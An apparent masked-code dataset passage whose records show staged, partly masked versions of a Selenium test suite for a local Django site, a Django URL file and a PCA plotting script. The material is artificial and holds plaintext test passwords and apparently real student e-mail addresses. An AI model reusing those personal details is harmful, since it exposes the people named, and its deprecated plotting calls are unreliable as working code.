"step-1": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n <mask token>\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n <mask token>\n <mask token>\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-2": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n <mask token>\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n <mask token>\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n 
correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-3": "<mask token>\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n <mask token>\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n <mask token>\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n correo = self.browser.find_element_by_id('id_correo')\n correo.clear()\n 
correo.send_keys('ba.montanez01@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n 
correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-4": "__author__ = 'asistente'\nfrom unittest import TestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('C:\\\\chromedriver\\\\chromedriver.exe')\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n\n def test_registro(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_register')\n link.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.send_keys('Rafael')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.send_keys('Medrano')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.send_keys('7')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.send_keys('3135555555')\n correo = self.browser.find_element_by_id('id_correo')\n correo.send_keys('re.medrano@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.send_keys('re.medrano')\n clave = self.browser.find_element_by_id('id_password')\n clave.send_keys('prueba123')\n botonGrabar = self.browser.find_element_by_id('id_grabar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Rafael Medrano\"]')\n self.assertIn('Rafael Medrano', span.text)\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n 
self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n\n def test_login(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n clave = self.browser.find_element_by_id('password')\n clave.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\" Logout\"]')\n self.assertIn('Logout', span.text)\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n self.browser.implicitly_wait(3)\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\"\n ).click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n correo = self.browser.find_element_by_id('id_correo')\n correo.clear()\n 
correo.send_keys('ba.montanez01@uniandes.edu.co')\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\\\chromedriver\\\\developer.jpg')\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH,\n '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n self.browser.get('http://localhost:8000')\n correo = self.browser.find_element_by_id('buscar')\n 
correo.send_keys('Betzy Editado Montanez Editado')\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n span = self.browser.find_element(By.XPATH,\n '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n",
"step-5": "__author__ = 'asistente'\n\n#from __future__ import absolute_import\n\nfrom unittest import TestCase\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\n\nclass FunctionalTest(TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome(\"C:\\\\chromedriver\\\\chromedriver.exe\")\n self.browser.implicitly_wait(2)\n\n def tearDown(self):\n self.browser.quit()\n\n def test_title(self):\n self.browser.get('http://localhost:8000')\n self.assertIn('BuscoAyuda', self.browser.title)\n\n def test_registro(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_register')\n link.click()\n\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.send_keys('Rafael')\n\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.send_keys('Medrano')\n\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.send_keys('7')\n\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\").click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.send_keys('3135555555')\n\n correo = self.browser.find_element_by_id('id_correo')\n correo.send_keys('re.medrano@uniandes.edu.co')\n\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\chromedriver\\developer.jpg')\n\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.send_keys('re.medrano')\n\n clave = self.browser.find_element_by_id('id_password')\n clave.send_keys('prueba123')\n\n botonGrabar = self.browser.find_element_by_id('id_grabar')\n botonGrabar.click()\n self.browser.implicitly_wait(3)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Rafael Medrano\"]')\n self.assertIn('Rafael Medrano', span.text)\n\n def test_verDetalle(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez 
Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH, '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n\n self.assertIn('Betzy Editado Montanez Editado', h2.text)\n\n def test_login(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n\n clave = self.browser.find_element_by_id('password')\n clave.send_keys('prueba123')\n\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\" Logout\"]')\n\n self.assertIn('Logout', span.text)\n\n\n def test_Editar(self):\n self.browser.get('http://localhost:8000')\n link = self.browser.find_element_by_id('id_login')\n link.click()\n\n nombreUsuario = self.browser.find_element_by_id('username')\n nombreUsuario.send_keys('ba.montanez')\n\n claveIngreso = self.browser.find_element_by_id('password')\n claveIngreso.send_keys('prueba123')\n\n botonIngresar = self.browser.find_element_by_id('id_ingresar')\n botonIngresar.click()\n\n self.browser.implicitly_wait(3)\n\n linkEditar = self.browser.find_element_by_id('id_editar')\n linkEditar.click()\n\n nombre = self.browser.find_element_by_id('id_nombre')\n nombre.clear()\n nombre.send_keys('Betzy Editado')\n\n apellidos = self.browser.find_element_by_id('id_apellidos')\n apellidos.clear()\n apellidos.send_keys('Montanez Editado')\n\n experiencia = self.browser.find_element_by_id('id_aniosExperiencia')\n experiencia.clear()\n experiencia.send_keys('10')\n\n self.browser.find_element_by_xpath(\n \"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']\").click()\n telefono = self.browser.find_element_by_id('id_telefono')\n telefono.clear()\n telefono.send_keys('313555666')\n\n correo = 
self.browser.find_element_by_id('id_correo')\n correo.clear()\n correo.send_keys('ba.montanez01@uniandes.edu.co')\n\n imagen = self.browser.find_element_by_id('id_imagen')\n imagen.send_keys('C:\\chromedriver\\developer.jpg')\n\n nombreUsuario = self.browser.find_element_by_id('id_username')\n nombreUsuario.clear()\n nombreUsuario.send_keys('ba.montanez2')\n\n clave = self.browser.find_element_by_id('id_password')\n clave.clear()\n clave.send_keys('prueba1234')\n\n botonGrabar = self.browser.find_element_by_id('id_editar')\n botonGrabar.click()\n\n self.browser.implicitly_wait(3)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n def test_Comentar(self):\n self.browser.get('http://localhost:8000')\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n span.click()\n self.browser.implicitly_wait(3)\n h2 = self.browser.find_element(By.XPATH, '//h2[text()=\"Betzy Editado Montanez Editado\"]')\n\n correo = self.browser.find_element_by_id('correo')\n correo.send_keys('prueba@prueba.com')\n\n comentario = self.browser.find_element_by_id('comentario')\n comentario.send_keys('Comentario Prueba')\n\n botonAceptar = self.browser.find_element_by_id('id_comentar')\n botonAceptar.click()\n self.browser.implicitly_wait(6)\n\n span = self.browser.find_element(By.XPATH, '//p[text()=\"Comentario Prueba\"]')\n self.assertIn('Comentario Prueba', span.text)\n\n def test_listado(self):\n self.browser.get('http://localhost:8000')\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)\n\n self.browser.implicitly_wait(3)\n span = self.browser.find_element(By.XPATH, '//span[text()=\"pepito perez\"]')\n self.assertIn('pepito perez', span.text)\n\n def test_buscar(self):\n 
self.browser.get('http://localhost:8000')\n\n correo = self.browser.find_element_by_id('buscar')\n correo.send_keys('Betzy Editado Montanez Editado')\n\n botonBuscar = self.browser.find_element_by_id('id_buscar')\n botonBuscar.click()\n self.browser.implicitly_wait(6)\n\n span = self.browser.find_element(By.XPATH, '//span[text()=\"Betzy Editado Montanez Editado\"]')\n self.assertIn('Betzy Editado Montanez Editado', span.text)",
"step-ids": [
6,
7,
9,
13,
14
]
}
|
[
6,
7,
9,
13,
14
] |
from django.urls import path
from .views import FirstModelView
urlpatterns = [path('firstModel', FirstModelView.as_view())]
|
normal
|
{
"blob_id": "4efd22d132accd0f5945a0c911b73b67654b92e4",
"index": 9358,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('firstModel', FirstModelView.as_view())]\n",
"step-3": "from django.urls import path\nfrom .views import FirstModelView\nurlpatterns = [path('firstModel', FirstModelView.as_view())]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
<|reserved_special_token_0|>
plt.clf()
<|reserved_special_token_0|>
plt.cla()
<|reserved_special_token_0|>
pca.fit(X)
<|reserved_special_token_0|>
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
<|reserved_special_token_0|>
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv('seeds.csv')
original['Class'] = original['Class'].apply(lambda x: transform(x))
X = original.drop('Class', 1)
y = original['Class']
fig = plt.figure(1, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca = PCA(n_components=3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
from numpy.testing import assert_array_almost_equal
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
from sklearn import datasets
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv('seeds.csv')
original['Class'] = original['Class'].apply(lambda x: transform(x))
X = original.drop('Class', 1)
y = original['Class']
fig = plt.figure(1, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca = PCA(n_components=3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
from numpy.testing import assert_array_almost_equal
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
from sklearn import datasets
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv("seeds.csv")
original["Class"] = original["Class"].apply(lambda x: transform(x))
X = original.drop("Class", 1)
y = original["Class"]
fig = plt.figure(1, figsize=(4,3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca= PCA(n_components = 3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(),
X[y == label, 1].mean() + 1.5,
X[y == label, 2].mean(), name,
horizontalalignment='center',
bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))
# Reorder the labels to have colors matching the cluster results
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral,
edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
# pca = PCA(n_components=3)
# pca.fit(df)
# U, S, VT = np.linalg.svd(df - df.mean(0))
# #assert_array_almost_equal(VT[:6], pca.components_)
# X_train_pca = pca.transform(df)
# X_train_pca2 = (df - pca.mean_).dot(pca.components_.T)
# #assert_array_almost_equal(X_train_pca, X_train_pca2)
# X_projected = pca.inverse_transform(X_train_pca)
# X_projected2 = X_train_pca.dot(pca.components_) + pca.mean_
# #assert_array_almost_equal(X_projected, X_projected2)
# loss = ((df - X_projected) ** 2).mean()
# print(loss)
# sse_loss = np.sum((df-X_projected)**2)
# print(sse_loss)
# print(pca.components_)
# print(pca.explained_variance_ratio_)
# # loadings
# loadings = pca.components_.T * np.sqrt(pca.explained_variance_)
# print(loadings)
# print(X_projected)
# print(len(X_projected))
# print(len(X_projected[0]))
# # We center the data and compute the sample covariance matrix.
# X_centered = df - np.mean(df, axis=0)
# cov_matrix = np.dot(X_centered.T, X_centered) / 569
# eigenvalues = pca.explained_variance_
# for eigenvalue, eigenvector in zip(eigenvalues, pca.components_):
# print(np.dot(eigenvector.T, np.dot(cov_matrix, eigenvector)))
# print(eigenvalue)
#np.savetxt("wdbc_ica.csv", X_projected, delimiter=",")
# print(pca)
# print(pca.explained_variance_ratio_)
# print(pca.singular_values_)
# print(len(pca.transform(df)))
# print(len(pca.transform(df)[0]))
|
flexible
|
{
"blob_id": "ef04e808a2a0e6570b28ef06784322e0b2ca1f8f",
"index": 4774,
"step-1": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\n<mask token>\nplt.clf()\n<mask token>\nplt.cla()\n<mask token>\npca.fit(X)\n<mask token>\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\n<mask token>\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
"step-3": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\noriginal = pd.read_csv('seeds.csv')\noriginal['Class'] = original['Class'].apply(lambda x: transform(x))\nX = original.drop('Class', 1)\ny = original['Class']\nfig = plt.figure(1, figsize=(4, 3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\nplt.cla()\npca = PCA(n_components=3)\npca.fit(X)\nX = pca.transform(X)\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
"step-4": "import numpy as np\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom numpy.testing import assert_array_almost_equal\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\nfrom sklearn import datasets\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\noriginal = pd.read_csv('seeds.csv')\noriginal['Class'] = original['Class'].apply(lambda x: transform(x))\nX = original.drop('Class', 1)\ny = original['Class']\nfig = plt.figure(1, figsize=(4, 3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\nplt.cla()\npca = PCA(n_components=3)\npca.fit(X)\nX = pca.transform(X)\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
